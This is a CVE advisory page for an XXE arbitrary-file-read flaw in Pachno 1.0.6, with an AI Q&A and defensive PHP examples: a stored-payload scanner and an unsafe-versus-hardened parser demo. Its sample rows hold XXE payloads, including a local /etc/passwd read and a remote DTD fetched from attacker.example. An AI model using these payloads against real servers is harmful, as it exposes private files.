CVE-2026-40042
Status: Received - Intake
XML External Entity Injection in Pachno 1.0.6 Allows Arbitrary File Read

Publication date: 2026-04-13

Last updated on: 2026-04-13

Assigner: VulnCheck

Description
Pachno 1.0.6 contains an XML external entity injection vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting unsafe XML parsing in the TextParser helper. Attackers can inject malicious XML entities through wiki table syntax and inline tags in issue descriptions, comments, and wiki articles to trigger entity resolution via simplexml_load_string() without LIBXML_NONET restrictions.
Meta Information
Published: 2026-04-13
Last Modified: 2026-04-13
Generated: 2026-05-07
AI Q&A: 2026-04-13
EPSS Evaluated: 2026-05-05
References: NVD, EUVD
Affected Vendors & Products
Currently, no data is known.
Helpful Resources
Exploitability
CWE
KEV
CWE ID and description
CWE-403: A process does not close sensitive file descriptors before invoking a child process, which allows the child to perform unauthorized I/O operations using those descriptors.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-40042 is a critical XML External Entity (XXE) injection vulnerability in Pachno 1.0.6, the only version the advisory names (this page lists no affected-product data, so earlier releases are neither confirmed nor excluded). It sits in the Wiki TextParser helper, which parses user-controlled markup with the PHP function simplexml_load_string() without the LIBXML_NONET flag. Note what that flag does and does not do: LIBXML_NONET forbids the parser from fetching remote resources (for example an attacker-hosted DTD); it does not stop resolution of entities that point at local files, which is what an arbitrary file read relies on. Whether local entities are resolved depends on the parser being asked to substitute entities (LIBXML_NOENT) or load DTDs (LIBXML_DTDLOAD), so the absence of LIBXML_NONET is only part of the unsafe configuration.

Attackers exploit the flaw by embedding malicious XML entity declarations in wiki table syntax and inline tags within issue descriptions, comments, and wiki articles. When the TextParser hands that markup to the XML parser, the entities are resolved, and an unauthenticated attacker can read arbitrary files from the server.

This page maps the CVE to CWE-403 (exposure of a file descriptor to an unintended control sphere). That weakness describes leaking open file descriptors to a child process, which is not the behaviour described here; XXE is conventionally classified under CWE-611 (Improper Restriction of XML External Entity Reference). Treat the CWE-403 label as a catalogue artefact rather than a description of the bug.


How can this vulnerability impact me?

This vulnerability allows unauthenticated remote attackers to read arbitrary files on the affected server, potentially exposing sensitive information.

Because it requires no privileges or user interaction, it can be exploited easily and remotely.

The page rates the impact as critical, affecting confidentiality, integrity, and availability, with CVSS scores of 9.3 (v4.0) and 9.8 (v3.1). Note that the behaviour actually described is an arbitrary file read, which is a confidentiality impact; the integrity and availability components reflect the assigned scores rather than anything stated in the description.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability is XML external entity injection through unsafe XML parsing in the Pachno Wiki TextParser component. Detection focuses on finding XML entity declarations injected via wiki table syntax and inline tags in issue descriptions, comments, and wiki articles.

Two properties of the bug shape the detection approach. First, the payload is submitted as ordinary content and stored, so it persists in the Pachno database: searching stored issue, comment and wiki text (or a database export) for DOCTYPE and ENTITY declarations finds past exploitation as well as current attempts. Second, the payload travels in a POST body, which standard web server access logs do not record; inspecting request bodies requires a WAF, a reverse proxy with body logging, or application-level logging. XML parsing errors in PHP logs and unexpected file access by the web server process are weaker, secondary signals.

Specific commands are not provided in the available resources. However, general detection approaches include:

  • Searching stored user content and any captured request bodies for XML payloads containing <!DOCTYPE or <!ENTITY declarations, SYSTEM or PUBLIC identifiers, and file://, php://filter or similar URI schemes (check URL-encoded and HTML-entity-encoded forms too, since the content was submitted through a form).
  • Using network monitoring to detect outbound requests from the Pachno host triggered by XML parsing, which indicates out-of-band (blind) XXE through a remote DTD.
  • Employing intrusion detection systems (IDS) or a WAF with signatures for XML external entity injection patterns on the Pachno issue, comment and wiki endpoints.
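The scan described above, written out as an added example. This is not Pachno code and not a tool the advisory provides; the wiki table syntax, the row identifiers and the three sample rows are constructed for the demonstration. It normalises each stored text (raw, URL-decoded, HTML-entity-decoded) and reports which XXE indicators match, so it can be pointed at a database export of issue descriptions, comments and wiki articles:

```php
<?php
// Added example (not Pachno code): heuristic scan of stored user-supplied
// text for XXE indicators. Pachno persists issue descriptions, comments and
// wiki articles, so a payload survives in the database even when POST
// bodies were never logged.
declare(strict_types=1);

/**
 * Return the names of the XXE indicators found in $text (empty array when none).
 * The text is also checked URL-decoded and HTML-entity-decoded, because
 * content submitted through a form may be stored in an escaped form.
 */
function xxeIndicators(string $text): array
{
    $candidates = [
        $text,
        rawurldecode($text),
        html_entity_decode($text, ENT_QUOTES | ENT_HTML5, 'UTF-8'),
    ];
    $patterns = [
        'doctype'          => '/<!DOCTYPE\b/i',
        'entity'           => '/<!ENTITY\b/i',
        // <!ENTITY name SYSTEM "..."> or a parameter entity <!ENTITY % name SYSTEM "...">
        'external_entity'  => '/<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b/i',
        // URI schemes commonly used to read local files or run PHP stream wrappers
        'local_scheme'     => '#\b(file|php|expect|data)://#i',
        'php_filter'       => '#php://filter/#i',
        // parameter entity reference, typical of blind/out-of-band XXE
        'parameter_entity' => '/%\w+;/',
    ];
    $hits = [];
    foreach ($patterns as $name => $re) {
        foreach ($candidates as $candidate) {
            if (preg_match($re, $candidate) === 1) {
                $hits[] = $name;
                break;
            }
        }
    }
    return $hits;
}

/** Scan rows of [id => stored text]; return only the flagged ids with their hits. */
function scanRows(array $rows): array
{
    $flagged = [];
    foreach ($rows as $id => $text) {
        $hits = xxeIndicators($text);
        if ($hits !== []) {
            $flagged[$id] = $hits;
        }
    }
    return $flagged;
}

// Constructed sample rows standing in for a database export (not real Pachno data).
$rows = [
    // benign wiki table: must not be flagged
    'wiki-1'    => "{| class=\"table\"\n! Name !! Status\n|-\n| build || ok\n|}",
    // payload stored HTML-escaped: local file read through an external general entity
    'comment-7' => '&lt;!DOCTYPE x [&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;'
                 . '&lt;x&gt;&amp;xxe;&lt;/x&gt;',
    // out-of-band variant: parameter entity pulling a remote DTD
    'issue-12'  => 'Repro: <!DOCTYPE d [<!ENTITY % p SYSTEM "http://attacker.example/evil.dtd"> %p;]>',
];

foreach (scanRows($rows) as $id => $hits) {
    printf("%s: %s\n", $id, implode(', ', $hits));
}
```

Expect comment-7 to report doctype, entity, external_entity and local_scheme, issue-12 to report doctype, entity, external_entity and parameter_entity, and wiki-1 to be silent. Any hit is worth a manual look; the `external_entity` and `parameter_entity` indicators in particular have almost no legitimate use in issue or wiki text.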

What immediate steps should I take to mitigate this vulnerability?

The fix is in how the XML is parsed. Adding LIBXML_NONET to the simplexml_load_string() call is necessary but not sufficient: it blocks the parser from fetching remote resources (which defeats out-of-band DTD tricks) but does nothing against an entity that points at a local file. The parse must not enable entity substitution (LIBXML_NOENT) or DTD loading (LIBXML_DTDLOAD), and user-supplied markup that contains a DOCTYPE should be rejected before it reaches the parser at all, since wiki and issue text never legitimately needs one. Where the PHP build exposes it (LIBXML_NO_XXE, added in PHP 8.4 for libxml2 2.13 and later), that flag can be set as an additional safeguard.

Update Pachno to a release in which the maintainers state the issue is fixed. This page lists no fixed version and records the CVE as still in intake, so check the vendor's own advisory for the corrected release.

Until a patch is applied, rejecting or stripping submissions that contain <!DOCTYPE or <!ENTITY in wiki table syntax, issue descriptions, comments, and wiki articles (at a WAF or in the application) reduces the risk of exploitation.
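The unsafe parse pattern beside a hardened wrapper, as an added example that is not Pachno's code. It assumes the vulnerable call enabled entity substitution (LIBXML_NOENT), which the advisory does not state for Pachno, and it uses a temporary file created by the script itself as the "secret" so the difference between the two calls is observable offline. The point it demonstrates is the caveat above: LIBXML_NONET on its own does not prevent a local file read.

```php
<?php
// Added example (not Pachno code): unsafe XML parse versus a hardened wrapper.
// ASSUMPTION: the unsafe variant passes LIBXML_NOENT; the advisory does not
// say which options Pachno used.
declare(strict_types=1);

// Constructed secret on disk, standing in for a config file the attacker wants.
$secretPath = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secretPath, 'db_password=hunter2');

// Constructed XXE payload: external general entity pointing at a local file,
// placed where wiki table cell content would end up.
$payload = '<?xml version="1.0"?>'
    . '<!DOCTYPE t [<!ENTITY xxe SYSTEM "file://' . $secretPath . '">]>'
    . '<t><cell>&xxe;</cell></t>';

/**
 * Unsafe: LIBXML_NOENT makes libxml substitute entities, external ones
 * included. LIBXML_NONET is set here deliberately to show that it does not
 * help: it only forbids network fetches, and file:// is not a network fetch.
 */
function parseUnsafe(string $xml): ?string
{
    libxml_use_internal_errors(true);
    $doc = simplexml_load_string($xml, SimpleXMLElement::class, LIBXML_NOENT | LIBXML_NONET);
    return $doc === false ? null : (string) $doc->cell;
}

/**
 * Hardened: refuse any document that carries a DOCTYPE (user-supplied wiki
 * or issue markup never needs one), and never pass LIBXML_NOENT or
 * LIBXML_DTDLOAD. LIBXML_NONET stays on as defence in depth; LIBXML_NO_XXE
 * is added when the running PHP/libxml2 exposes it.
 */
function parseSafe(string $xml): ?string
{
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        return null; // reject rather than parse
    }
    $options = LIBXML_NONET | LIBXML_NOERROR | LIBXML_NOWARNING;
    if (defined('LIBXML_NO_XXE')) {
        $options |= LIBXML_NO_XXE;
    }
    libxml_use_internal_errors(true);
    $doc = simplexml_load_string($xml, SimpleXMLElement::class, $options);
    return $doc === false ? null : (string) $doc->cell;
}

echo "unsafe (NOENT|NONET): ", var_export(parseUnsafe($payload), true), "\n";
echo "hardened:             ", var_export(parseSafe($payload), true), "\n";

unlink($secretPath);
```

The unsafe call returns the file contents even though LIBXML_NONET is set; the hardened call returns null because the DOCTYPE is rejected before libxml sees it. If the DOCTYPE check were removed, the hardened options alone would still not substitute the entity, but rejecting the document early keeps the parser from processing attacker-supplied DTD internals at all.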


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability allows unauthenticated attackers to read arbitrary files on the server, leading to exposure of sensitive data. Such unauthorized data exposure can result in non-compliance with data protection regulations like GDPR and HIPAA, which mandate strict controls over the confidentiality and integrity of personal and sensitive information.

Because the vulnerability impacts confidentiality, integrity, and availability with high severity, organizations using affected versions of Pachno may face increased risk of data breaches, potentially violating regulatory requirements for protecting personal data and ensuring system security.

